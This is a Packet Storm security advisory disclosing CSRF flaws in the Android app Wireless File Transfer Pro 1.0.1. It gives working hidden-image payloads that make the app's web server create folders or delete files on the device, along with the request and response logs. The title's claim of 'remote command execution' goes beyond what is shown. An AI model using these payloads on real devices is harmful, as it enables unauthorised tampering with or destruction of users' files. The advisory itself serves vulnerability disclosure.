exploit the possibilities

Wireless File Transfer Pro 1.0.1 CSRF

Wireless File Transfer Pro 1.0.1 CSRF
Posted Feb 9, 2015
Authored by Hadji Samir

Wireless File Transfer Pro version 1.0.1 suffers from multiple cross site request forgery vulnerabilities.

tags | exploit, vulnerability, csrf
MD5 | 16631ccfd6f0837f933065a04d09cd66

Wireless File Transfer Pro 1.0.1 CSRF

Change Mirror Download

Document Title:
===============
Wireless File Transfer Pro 1.0.1 - (Android) CSRF Remote Command Execution (Creat, Delete)


Release Date:
=============
2015-02-10


Product & Service Introduction:
===============================
Wireless File Transfer Pro is the advanced version of Wireless File Transfer.


(Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro )

Affected Product(s):
====================
Wireless File Transfer Pro 5.9.5 - (Android) Web Application 1.0.1
Lextel Technology


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium

Request Method(s):
[+] [GET]

Vulnerable Module(s):
[+] browse

Vulnerable Parameter(s):
[+] fileExplorer.html?

Affected Module(s):
[+] Index of Documents (http://localhost:8888)


Technical Details & Description:
================================
cross site request forgery has been discovered in the Wireless File Transfer Pro 1.0.1 Android mobile web-application.
The mobile web-application is vulnerable to a combination of cross site request forgery and local command injection attacks.



Proof of Concept (PoC):
=======================
Creat New Folder

<img src="http://192.168.1.2:8888/fileExplorer.html?action=create&type=folder&folderName=test1" width="0" height="0" border="0">

--- PoC Session Logs [GET] (Execution) ---
GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive





HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 4

<a href="#" onclick="actionBrower('/sdcard/test1')">test1</a></td></td><td width="24%"></td><td width="24%">2015-02-09 18:12:19</td><td width="15%">


Delete File, Folder

<img src="http://192.168.1.2:8888/fileExplorer.html?action=deleteFile&fileName=test""width="0" height="0" border="0">

--- PoC Session Logs [GET] (Execution) ---


GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive


HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 30





Reference:
http://localhost:8888/

Security Risk:
==============
The security risk of the cross site request forgery issue and command injection vulnerability is estimated as medium. (CVSS 4.4)


Credits & Authors:
==================
Hadji Samir s-dz@hotmail.fr


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    21 Files
  • 2
    Apr 2nd
    35 Files
  • 3
    Apr 3rd
    21 Files
  • 4
    Apr 4th
    16 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    1 Files
  • 7
    Apr 7th
    2 Files
  • 8
    Apr 8th
    23 Files
  • 9
    Apr 9th
    19 Files
  • 10
    Apr 10th
    15 Files
  • 11
    Apr 11th
    14 Files
  • 12
    Apr 12th
    11 Files
  • 13
    Apr 13th
    2 Files
  • 14
    Apr 14th
    5 Files
  • 15
    Apr 15th
    14 Files
  • 16
    Apr 16th
    19 Files
  • 17
    Apr 17th
    19 Files
  • 18
    Apr 18th
    8 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close